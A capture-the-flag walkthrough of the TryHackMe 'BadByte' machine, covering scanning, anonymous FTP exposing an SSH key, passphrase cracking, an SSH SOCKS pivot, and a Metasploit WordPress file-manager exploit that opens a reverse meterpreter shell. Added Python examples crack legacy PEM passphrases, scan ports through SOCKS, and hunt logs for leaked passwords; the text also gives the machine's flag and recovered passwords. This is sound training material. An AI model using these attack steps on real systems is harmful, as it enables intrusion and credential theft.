BadByte is an easy TryHackMe machine that covers basic port scanning, cracking the passphrase of an SSH private key, and SSH port forwarding (a SOCKS pivot) to reach a web service that is only bound to the target's loopback interface.
Reconnaissance
I used RustScan for the scan, passing -sC -sV through to nmap for the ports it finds:
└─$ rustscan -a 10.10.184.227 -- -sC -sV
[~] The config file is expected to be at "/home/devcli3nt/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.184.227:22
Open 10.10.184.227:30024
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

PORT      STATE SERVICE REASON  VERSION
22/tcp    open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:a2:ed:93:4b:9c:bf:bb:33:4d:48:0d:fe:a4:de:96 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9/A7kkuN5E+SS1C6w1NfeY196Rj4Y1Yx7njNCwNaCgIv8m+V+7MTHsRn3txLXRTHXErMqW3ypCmmjuY3O40kAragZSgA/XhdesGxGVa0szHK7H4fB28uQiyZgkOfIt/12kGaHB3iGwOeex2Hdg6ct4FdxTWKgDvuKZSLVoPXG66R8SOHql2cXfUtzyUMNJTTqoUED69soEJVG2ctfPKXi4BfFqM3OK2HgKzbmcSPXlLUTNhlcvjPuTa0kMRqiNTMVdP0PjSFdoaMviXHiznW7Fn6NHe3R/vIQt8Ac05Mdvim21QjRpJ4pm7v5+q1wXCJxGG6Ov71yThKP6yZ4ByMl
|   256 22:72:00:36:eb:37:12:9f:5a:cc:c2:73:e0:4f:f1:4e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM9QUKykbzCSI7+PgoVzHNKOVIWf+zm0LN/f4n0VJc/P0J9TzLImkYHIOCnRFpNUPtiWGXbHXi67FQxEpgZMReo=
|   256 78:1d:79:dc:8d:41:f6:77:60:65:f5:74:b6:cc:8b:6d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKrvf1zJBhqU1RxUCYuTgoIy+7NzCqZeFWV67bt8+APV
30024/tcp open  ftp     syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp          1743 Mar 23  2021 id_rsa
|_-rw-r--r--    1 ftp      ftp            78 Mar 23  2021 note.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.2.60
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.21 seconds
Questions
How many ports are open?
2
What service is running on the lowest open port?
ssh
What non-standard port is open?
30024
What service is running on the non-standard port?
ftp
Foothold
The nmap ftp-anon script run by RustScan showed that anonymous login is enabled on the FTP service on port 30024, and the listing exposes an SSH private key (id_rsa) and a note. After downloading both files over anonymous FTP, the note gives a username and the key turns out to be passphrase-protected, so the passphrase is converted to a john hash with ssh2john and attacked with rockyou.txt:
└─$ cat note.txt
I always forget my password. Just let me store an ssh key here.
- errorcauser
└─$ locate ssh2john
/usr/share/john/ssh2john.py
└─$ /usr/share/john/ssh2john.py id_rsa > hashfile
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashfile
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
cupcake          (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:22 DONE (2022-01-27 09:02) 0.04522g/s 648652p/s 648652c/s 648652C/s a6_123..*7¡Vamos!
Session completed
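Why this cracked in seconds is worth seeing in code. The john output reports "Cost 1 ... is 1" (MD5/3DES) and an iteration count of 2: a legacy "Proc-Type: 4,ENCRYPTED" PEM key derives its cipher key from the passphrase with OpenSSL's EVP_BytesToKey (MD5 over passphrase and an 8-byte salt taken from the IV, no work factor), so each candidate costs a couple of MD5 calls and one decryption. The following is an added example for this writeup, not code from the original post, from john or from ssh2john: it parses a legacy PEM key, runs that KDF, decrypts, rejects candidates by padding and DER shape, and confirms a hit by fully parsing the key (john's "may emit false positives" note is exactly this last step). It needs the cryptography package; the encrypted key and the short wordlist are constructed inline, and only AES-CBC keys are handled (DES-EDE3-CBC uses the same KDF with a 24-byte key).

```python
"""Guess the passphrase of a legacy-format encrypted PEM private key (ssh2john + john, by hand).

Added example for the BadByte writeup; not code from the original post, john or ssh2john.
Requires the `cryptography` package. Key material and wordlist below are constructed.
"""
import base64
import hashlib
import re
from typing import Iterable, Optional, Tuple

from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

_HEADER = re.compile(
    r"-----BEGIN (?P<kind>[A-Z ]+) PRIVATE KEY-----\s*"
    r"Proc-Type: 4,ENCRYPTED\s*"
    r"DEK-Info: (?P<cipher>[A-Z0-9-]+),(?P<iv>[0-9A-Fa-f]+)\s*"
    r"(?P<body>[A-Za-z0-9+/=\s]+?)"
    r"-----END (?P=kind) PRIVATE KEY-----"
)
KEY_LEN = {"AES-128-CBC": 16, "AES-256-CBC": 32}   # DES-EDE3-CBC would be 24, same KDF


def evp_bytes_to_key(passphrase: bytes, salt: bytes, key_len: int) -> bytes:
    """OpenSSL EVP_BytesToKey, MD5, count=1: D_i = MD5(D_{i-1} || passphrase || salt).
    No iteration count and an 8-byte salt taken from the IV: this is why it cracks fast."""
    out, prev = b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + passphrase + salt).digest()
        out += prev
    return out[:key_len]


def parse_legacy_pem(pem: bytes) -> Tuple[str, bytes, bytes]:
    """Return (cipher name, IV, ciphertext) from a legacy encrypted PEM key."""
    m = _HEADER.search(pem.decode())
    if m is None or m["cipher"] not in KEY_LEN:
        raise ValueError("not a supported encrypted legacy PEM key")
    return m["cipher"], bytes.fromhex(m["iv"]), base64.b64decode("".join(m["body"].split()))


def try_passphrase(passphrase: bytes, cipher: str, iv: bytes, body: bytes) -> Optional[bytes]:
    """Decrypt with one candidate; return the DER payload if it is plausibly a key, else None."""
    key = evp_bytes_to_key(passphrase, iv[:8], KEY_LEN[cipher])
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    plain = dec.update(body) + dec.finalize()
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        return None                                  # bad PKCS#7 padding: wrong passphrase
    der = plain[:-pad]
    return der if der[:1] == b"\x30" else None       # DER SEQUENCE is the cheap sanity check


def crack(pem: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first word in `wordlist` that decrypts `pem` to a parseable private key."""
    cipher, iv, body = parse_legacy_pem(pem)
    for word in wordlist:
        der = try_passphrase(word.encode(), cipher, iv, body)
        if der is None:
            continue
        # Valid padding plus a leading 0x30 can happen by chance (john's "false positives"
        # warning); a full parse of the key settles it.
        try:
            serialization.load_der_private_key(der, password=None)
        except ValueError:
            continue
        return word
    return None


def make_legacy_pem(passphrase: bytes, iv: bytes, bits: int = 2048) -> bytes:
    """Constructed fixture: a fresh RSA key written in the legacy encrypted PEM format."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=bits)
    der = key.private_bytes(serialization.Encoding.DER,
                            serialization.PrivateFormat.TraditionalOpenSSL,
                            serialization.NoEncryption())
    pad = 16 - len(der) % 16
    enc = Cipher(algorithms.AES(evp_bytes_to_key(passphrase, iv[:8], 32)), modes.CBC(iv)).encryptor()
    body = base64.encodebytes(enc.update(der + bytes([pad]) * pad) + enc.finalize()).decode()
    return (f"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
            f"DEK-Info: AES-256-CBC,{iv.hex().upper()}\n\n{body}"
            f"-----END RSA PRIVATE KEY-----\n").encode()


SAMPLE_IV = bytes.fromhex("0123456789ABCDEF0123456789ABCDEF")        # constructed, not random
SAMPLE_PEM = make_legacy_pem(b"cupcake", SAMPLE_IV)                    # constructed test key
SAMPLE_WORDLIST = ["123456", "password", "cupcake", "letmein"]          # stand-in for rockyou.txt

if __name__ == "__main__":
    print("passphrase:", crack(SAMPLE_PEM, SAMPLE_WORDLIST))
```

Against a real id_rsa, read the file and pass a generator over rockyou.txt as the wordlist. Keys written by a modern ssh-keygen use the "OPENSSH PRIVATE KEY" format with bcrypt (john cost 2), where each guess costs thousands of rounds instead of one MD5, which is the difference between 22 seconds and days.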
Questions
What username do we find during the enumeration process?
errorcauser
What is the passphrase for the RSA private key?
cupcake
Port Forwarding
Create an SSH dynamic port forward with the recovered key: -D 1337 opens a SOCKS proxy on the attacker's local port 1337, and anything sent into it is relayed out from the target's side. ssh refuses a key file with loose permissions (chmod 600 id_rsa first) and prompts for the passphrase, cupcake. Then point proxychains at the listener:
└─$ ssh -i id_rsa -D 1337 errorcauser@10.10.184.227
# After the connection is up, change the socks settings in proxychains
└─$ sudo nano /etc/proxychains4.conf
# under [ProxyList]: socks5 127.0.0.1 1337
Now run nmap through proxychains to enumerate services on the target's loopback interface, which the external scan could not see. proxychains can only relay complete TCP connections, so nmap must use a connect scan (-sT); a default SYN scan does not go through the SOCKS tunnel. Port 80 turns out to host WordPress:
└─$ proxychains nmap -sT -p 80 -sC -sV 127.0.0.1
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-27 09:41 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00017s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.7
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BadByte – You're looking at me, but they are lookin...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.46 seconds
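What proxychains does for each port nmap -sT touches is a SOCKS5 CONNECT handshake with the ssh -D listener, and the proxy's reply code is the only signal the scanner gets. The following is an added example for this writeup (not from the original post, proxychains, nmap or OpenSSH) that performs that handshake by hand and classifies ports from the reply. Because the proxy only ever relays completed TCP connections, there is nowhere to push a raw SYN through, which is the concrete reason -sS cannot work under proxychains. The fake SOCKS5 server at the bottom is a constructed stand-in for the ssh -D listener so the code runs offline; it answers CONNECT from a fixed set of "open" ports instead of relaying anything, and the addresses in the usage call are placeholders.

```python
"""Connect-scan through a SOCKS5 proxy (what `proxychains nmap -sT` does per port).

Added example for the BadByte writeup; not code from the original post or from any of the
tools it uses. The fake server is constructed for offline use.
"""
import socket
import struct
import threading
from typing import Dict, Iterable, Tuple

SOCKS_VER = 5


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-handshake")
        buf += chunk
    return buf


def socks5_connect(proxy: Tuple[str, int], host: str, port: int, timeout: float = 5.0) -> int:
    """Run a SOCKS5 CONNECT for host:port through `proxy`; return the proxy's reply code
    (0x00 = succeeded, anything else = the proxy could not connect)."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        # Greeting: VER=5, one method offered, 0x00 = no authentication.
        s.sendall(bytes([SOCKS_VER, 1, 0x00]))
        ver, method = _recv_exact(s, 2)
        if ver != SOCKS_VER or method != 0x00:
            raise ConnectionError(f"proxy refused no-auth: ver={ver} method={method:#x}")
        # Request: VER, CMD=1 (CONNECT), RSV, ATYP=3 (domain name). Sending the name rather
        # than an address makes the proxy resolve it on the pivot side, which is what the
        # proxy_dns option in proxychains is for.
        name = host.encode()
        s.sendall(bytes([SOCKS_VER, 0x01, 0x00, 0x03, len(name)]) + name + struct.pack("!H", port))
        ver, rep, _rsv, atyp = _recv_exact(s, 4)
        # Drain BND.ADDR/BND.PORT so the stream would be positioned for data if rep == 0.
        if atyp == 0x01:
            _recv_exact(s, 4 + 2)
        elif atyp == 0x03:
            _recv_exact(s, _recv_exact(s, 1)[0] + 2)
        elif atyp == 0x04:
            _recv_exact(s, 16 + 2)
        return rep


def scan_via_socks(proxy: Tuple[str, int], host: str, ports: Iterable[int]) -> Dict[int, str]:
    """Classify each port as open/closed from the CONNECT reply. Proxies differ in how precisely
    they report failures, so only 0x00 counts as open; any other reply, or a connection dropped
    during the handshake, is treated as closed."""
    results = {}
    for p in ports:
        try:
            rep = socks5_connect(proxy, host, p)
        except OSError:          # ConnectionError and socket timeouts are both OSError
            rep = None
        results[p] = "open" if rep == 0x00 else "closed"
    return results


def start_fake_socks5(open_ports: Iterable[int]) -> Tuple[str, int]:
    """Constructed stand-in for the ssh -D listener: replies 0x00 for ports in `open_ports`
    and 0x05 (connection refused) otherwise, relaying nothing. Returns its (host, port)."""
    open_ports = set(open_ports)
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def handle(conn: socket.socket) -> None:
        try:
            with conn:
                nmethods = _recv_exact(conn, 2)[1]
                _recv_exact(conn, nmethods)
                conn.sendall(bytes([SOCKS_VER, 0x00]))
                _ver, _cmd, _rsv, atyp = _recv_exact(conn, 4)
                if atyp == 0x03:
                    _recv_exact(conn, _recv_exact(conn, 1)[0])
                else:
                    _recv_exact(conn, 4 if atyp == 0x01 else 16)
                port = struct.unpack("!H", _recv_exact(conn, 2))[0]
                rep = 0x00 if port in open_ports else 0x05
                conn.sendall(bytes([SOCKS_VER, rep, 0x00, 0x01]) + bytes(4) + bytes(2))
        except OSError:
            pass

    def serve() -> None:
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


if __name__ == "__main__":
    # Against the real pivot this would be scan_via_socks(("127.0.0.1", 1337), "127.0.0.1", ports).
    fake = start_fake_socks5({22, 80})
    print(scan_via_socks(fake, "127.0.0.1", [22, 80, 443]))
```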
The site's wp-file-manager plugin is affected by an unauthenticated file upload leading to remote code execution (CVE-2020-25213), for which Metasploit ships the multi/http/wp_file_manager_rce module. After searching for it, `use 0` selects the first result. RHOSTS is 127.0.0.1 because the request is relayed through the SOCKS proxy, so msfconsole itself has to be started under proxychains (or the module's Proxies option set to socks5:127.0.0.1:1337); LHOST is the attacker's VPN address, which the target reaches directly for the reverse shell:

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set LHOST 10.9.2.60
LHOST => 10.9.2.60
msf6 exploit(multi/http/wp_file_manager_rce) > run

[*] Started reverse TCP handler on 10.9.2.60:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] 127.0.0.1:80 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/CMRdTO.php
[*] Sending stage (39282 bytes) to 10.10.184.227
[+] Deleted CMRdTO.php
[*] Meterpreter session 1 opened (10.9.2.60:4444 -> 10.10.184.227:58718) at 2021-05-03 19:42:28 +0200
Questions
What CMS is running on the machine?
wordpress
What is the CVE number for directory traversal vulnerability?
CVE-2020-11738
What is the CVE number for remote code execution vulnerability?
CVE-2020-25213
What is the name of user that was running CMS?
cth
What is the user flag?
THM{227906201d17d9c45aa93d0122ea1af7}
Privilege Escalation
The shell command log at /var/log/bash.log was readable from the web-server user's shell (cat /var/log/bash.log), and it contained an old password: G00dP@$sw0rd2020
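Reading a whole command log by eye works on a CTF box; on a real host the same hunt is better done systematically, and the check is equally useful on the defensive side for catching secrets that ended up in shell history or audit logs. The following is an added example for this writeup, not from the original post: a small scanner with patterns for the common ways a password lands on a command line (piped into sudo -S or passwd, mysql -p, --password=, sshpass, PASSWORD= environment assignments, credentials embedded in URLs). It runs over constructed sample log lines so it works offline; the sample includes the password found above purely as an illustration, and the usage call's file path is an assumption.

```python
"""Hunt a shell log or history file for credentials leaked on command lines.

Added example for the BadByte writeup; not code from the original post. The sample log
below is constructed for offline use.
"""
import re
from typing import Iterable, List, Tuple

# (label, pattern); group 1 captures the secret.
CREDENTIAL_PATTERNS = [
    ("piped-into-sudo/su/passwd",
     re.compile(r"""echo\s+(?:-e\s+)?['"]?([^'"|\s]+)['"]?\s*\|\s*(?:sudo\s+-S|su\b|passwd\b|chpasswd\b)""")),
    ("sshpass", re.compile(r"""sshpass\s+-p\s*['"]?([^'"\s]+)""")),
    ("mysql -p", re.compile(r"""\bmysql\w*\b.*?\s-p(?!\s)['"]?([^'"\s]+)""")),
    ("--password=", re.compile(r"""--password[=\s]+['"]?([^'"\s]+)""")),
    ("env PASS=", re.compile(r"""\b[A-Z_]*PASS(?:WORD|WD)?=['"]?([^'"\s]+)""")),
    ("url-embedded", re.compile(r"://[^/\s:@]+:([^@\s]+)@")),
    ("useradd/usermod -p", re.compile(r"""\buser(?:add|mod)\b.*?\s-p\s*['"]?([^'"\s]+)""")),
]


def find_credentials(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, pattern_label, secret) for every credential-looking token."""
    hits = []
    for n, line in enumerate(lines, 1):
        for label, pat in CREDENTIAL_PATTERNS:
            for m in pat.finditer(line):
                hits.append((n, label, m.group(1)))
    return hits


def unique_secrets(lines: Iterable[str]) -> List[str]:
    """Distinct secrets in first-seen order: the candidate list to try against su, sudo or ssh."""
    seen: List[str] = []
    for _, _, secret in find_credentials(list(lines)):
        if secret not in seen:
            seen.append(secret)
    return seen


# Constructed sample log lines (not the real /var/log/bash.log from the machine).
SAMPLE_BASH_LOG = r"""
cd /var/www/html
ls -la wp-content/plugins
echo 'G00dP@$sw0rd2020' | sudo -S systemctl restart apache2
mysql -u wpuser -pWpDbPass123 wordpress
sshpass -p OldSshPw ssh cth@10.10.184.227
export DB_PASSWORD=notused
curl http://backup:B4ckupPw@10.0.0.5/dump.sql
tail -f /var/log/apache2/error.log
""".strip().splitlines()

if __name__ == "__main__":
    # On a target: find_credentials(open("/var/log/bash.log").read().splitlines())  (path assumed)
    for lineno, label, secret in find_credentials(SAMPLE_BASH_LOG):
        print(f"line {lineno}: {label}: {secret}")
```

A hit is only a candidate: the next step is the same as on this box, trying each unique secret against su/sudo for the local users and against ssh for any other host named in the log. The world-readable log itself is the finding a defender would want to fix; the patterns also make a reasonable pre-commit or log-pipeline check for the same leak.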